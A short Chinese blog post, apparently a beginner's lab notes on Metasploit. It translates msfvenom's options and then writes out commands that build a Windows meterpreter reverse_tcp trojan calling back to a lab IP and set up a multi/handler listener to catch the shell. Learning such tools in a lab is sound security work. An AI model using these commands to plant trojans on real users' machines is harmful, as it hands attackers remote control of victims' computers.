初尝试metasploit

Posted by bfpiaoran on August 11, 2017

使用msfvneom制作木马首先
Options:
-p, –payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用’-‘或者stdin指定
-l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, –nopsled 为payload预先指定一个NOP滑动长度
-f, –format 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
-e, –encoder [encoder] 指定需要使用的encoder(编码器)
-a, –arch 指定payload的目标架构
–platform 指定payload的目标平台
-s, –space 设定有效攻击荷载的最大长度
-b, –bad-chars 设定规避字符集,比如: ‘\x00\xff’
-i, –iterations 指定payload的编码次数
-c, –add-code 指定一个附加的win32 shellcode文件
-x, –template 指定一个自定义的可执行文件作为模板
-k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行
–payload-options 列举payload的标准选项
-o, –out 保存payload
-v, –var-name 指定一个自定义的变量,以确定输出格式
–shellest 最小化生成payload
-h, –help 查看帮助选项
–help-formats 查看msf支持的输出格式列表
这是一些翻译

在kali 2016 上运行
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.128 lport=4444 -f exe -o /root/Desktop/shell.exe
设置侦听本机 ip 和侦听端口

将shell木马 复制到客户机并运行
使用msfconsole侦听
msfconsole

use exploit/multi/handler
set lport 4444
exploit

这里和windows cmd 一样了